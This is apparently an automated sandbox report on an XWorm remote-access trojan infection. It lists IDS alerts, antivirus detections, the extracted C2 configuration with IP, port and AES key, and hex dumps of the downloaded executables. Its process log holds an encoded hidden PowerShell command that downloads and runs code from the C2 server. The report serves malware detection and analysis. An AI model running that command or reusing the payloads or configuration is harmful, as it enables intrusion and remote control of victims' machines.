Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline", ProcessId: 2168, ProcessName: csc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-26T04:16:32.921009+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-26T04:16:31.629098+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
2025-03-26T04:16:32.921009+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-26T04:16:31.629098+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
2025-03-26T04:16:32.921009+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-26T04:16:31.433972+0100 | 2860704 | 1 | A Network Trojan was detected | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-26T04:16:43.466077+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:16:49.514320+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:01.479932+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:13.451658+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:13.650572+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:25.425533+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:37.392026+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:43.466619+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:44.856662+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:50.030635+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:50.227154+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:50.421592+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:54.840066+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:17:55.283537+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:07.090159+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:10.733214+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:10.936247+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:13.464004+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:16.467874+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:26.591249+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:35.591181+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:36.715860+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:36.913478+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:42.968290+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:43.465214+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:54.953471+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:18:57.312199+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:02.653237+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:07.043940+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:13.467848+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:16.762696+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:18.887479+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:19.083128+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:24.279149+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:26.247568+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:34.544073+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:34.743055+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:37.888014+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:39.795628+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:40.235872+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:43.464364+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:45.185013+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:45.381022+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:50.684969+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:19:50.881516+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:20:02.715303+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:20:13.465253+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:20:13.967983+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:20:15.060706+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:20:19.015072+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:20:25.631596+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:20:27.590423+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
2025-03-26T04:20:31.899017+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-26T04:16:49.517689+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:17:01.482824+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:17:13.453838+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:17:25.428914+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:17:37.393662+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:17:44.861673+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:17:50.227234+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:17:50.421926+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:17:50.666373+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:17:54.844212+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:17:55.285057+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:07.092219+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:10.937363+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:11.179489+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:16.469414+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:26.594039+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:35.596080+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:36.913554+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:37.164279+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:42.969926+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:54.956480+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:18:57.317866+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:02.678853+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:07.045934+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:16.764512+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:19.083288+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:19.318764+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:24.281096+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:26.249496+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:34.743146+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:34.937960+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:37.889843+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:39.800308+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:40.237882+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:45.381284+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:45.617888+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
2025-03-26T04:19:50.881600+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
            2025-03-26T04:19:51.136493+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:02.717007+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:13.972424+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:15.062352+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:19.016686+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:25.634097+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:27.592172+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            2025-03-26T04:20:31.900002+010028529231Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-26T04:16:43.466077+010028588011Malware Command and Control Activity Detected92.255.85.24372192.168.2.449722TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-26T04:18:35.395014+010028587991Malware Command and Control Activity Detected192.168.2.44972292.255.85.24372TCP


AV Detection

Source: http://92.255.85.2/a.mp4 | Avira URL Cloud: Label: malware
Source: http://92.255.85.2/k.exe | Avira URL Cloud: Label: phishing
Source: http://92.255.85.2/Fox.exe | Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dll | Avira: detection malicious, Label: TR/Dropper.Gen7
Source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["92.255.85.2"], "Port": 4372, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.66"}
Source: 92.255.85.2.bat | Virustotal: Detection: 17%
Source: 92.255.85.2.bat | ReversingLabs: Detection: 16%
Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String decryptor: 92.255.85.2
Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String decryptor: 4372
Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String decryptor: P0WER
Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String decryptor: <Xwormmm>
Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String decryptor: XWorm V5.66
Source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String decryptor: USB.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\strztqek\strztqek.pdbhP | source: powershell.exe, 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\strztqek\strztqek.pdb | source: powershell.exe, 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 2860704 - Severity 1 - ETPRO MALWARE Single Character .mp4 Download With Minimal Headers - Likely Hostile : 192.168.2.4:49717 -> 92.255.85.2:80
Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.85.2:4372 -> 192.168.2.4:49722
Source: Network traffic | Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.85.2:4372 -> 192.168.2.4:49722
Source: Network traffic | Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49722 -> 92.255.85.2:4372
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49722 -> 92.255.85.2:4372
Source: Network traffic | Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49722 -> 92.255.85.2:4372
Source: Network traffic | Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49717 -> 92.255.85.2:80
Source: Malware configuration extractor | URLs: 92.255.85.2
Source: global traffic | TCP traffic: 192.168.2.4:49722 -> 92.255.85.2:4372
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 25 Mar 2025 21:42:34 GMTAccept-Ranges: bytesETag: "24cc0d1ce9ddb1:0"Server: Microsoft-IIS/10.0Date: Wed, 26 Mar 2025 03:16:31 GMTContent-Length: 497568Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 95 fc ac ec 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ae 06 00 00 cc 00 00 00 00 00 00 8e cc 06 00 00 20 00 00 00 e0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 07 00 00 02 00 00 6a bc 07 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 cc 06 00 57 00 00 00 00 e0 06 00 9c c8 00 00 00 00 00 00 00 00 00 00 00 7c 07 00 a0 1b 00 00 00 c0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 ac 06 00 00 20 00 00 00 ae 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c c8 00 00 00 e0 06 00 00 ca 00 00 00 b0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 07 00 00 02 00 00 00 7a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 cc 06 00 00 00 00 00 48 00 00 00 02 00 05 00 40 5d 01 00 f4 6e 05 00 03 00 02 00 04 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1e 00 28 05 01 00 06 2a 1e 00 28 06 01 00 06 2a 1e 00 28 07 01 00 06 2a 1e 00 28 08 01 00 06 2a 1e 00 28 09 01 00 06 2a 1e 00 28 0a 01 00 06 2a 1e 00 28 0b 01 00 06 2a 1e 00 28 0c 01 00 06 2a 1e 00 28 0d 01 00 06 2a 1e 00 28 0e 01 00 06 2a 1e 00 28 0f 01 00 06 2a 1e 00 28 10 01 00 06 2a 1e 00 28 11 01 00 06 2a 1e 00 28 12 01 00 06 2a 1e 00 28 13 01 00 06 2a 1e 00 28 14 01 00 06 2a 1e 00 28 15 01 00 06 2a 1e 00 28 16 01 00 06 2a 1e 00 28 17 01 00 06 2a 1e 00 28 18 01 00 06 2a 1e 00 28 19 01 00 06 2a 1e 00 28 1a 01 00 06 2a 1e 00 28 1b 01 00 06 2a 1e 00 28 1c 01 00 06 2a 1e 00 28 1d 01 00 06 2a 1e 00 28 1e 01 00 06 2a 1e 00 28 1f 01 00 06 2a 1e 00 28 20 01 00 06 2a 1e 00 28 21 01 00 06 2a 1e 00 28 22 01 00 06 2a 1e 00 28 23 01 00 06 2a 1e 00 28 24 01 00 06 2a 1e 00 28 25 01 00 06 2a 1e 00 28 26 01 00 06 2a 1e 00 28 27 01 00 06 2a 1e 00 28 28 01 00 06 2a 1e 00 28 29 01 00 06 2a 1e 00 28 2a 01 00 06 2a 1e 00 28 2b 01 00 06 2a 1e 00 28 2c 01 00 06 2a 1e 00 28
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 24 Mar 2025 16:34:54 GMTAccept-Ranges: bytesETag: "6cef5acda9cdb1:0"Server: Microsoft-IIS/10.0Date: Wed, 26 Mar 2025 03:16:32 GMTContent-Length: 33280Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ad 89 e1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 78 00 00 00 08 00 00 00 00 00 00 6e 97 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 97 00 00 4f 00 00 00 00 a0 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 77 00 00 00 20 00 00 00 78 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 04 00 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 97 00 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 4f 00 00 f0 47 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 15 00 00 0a 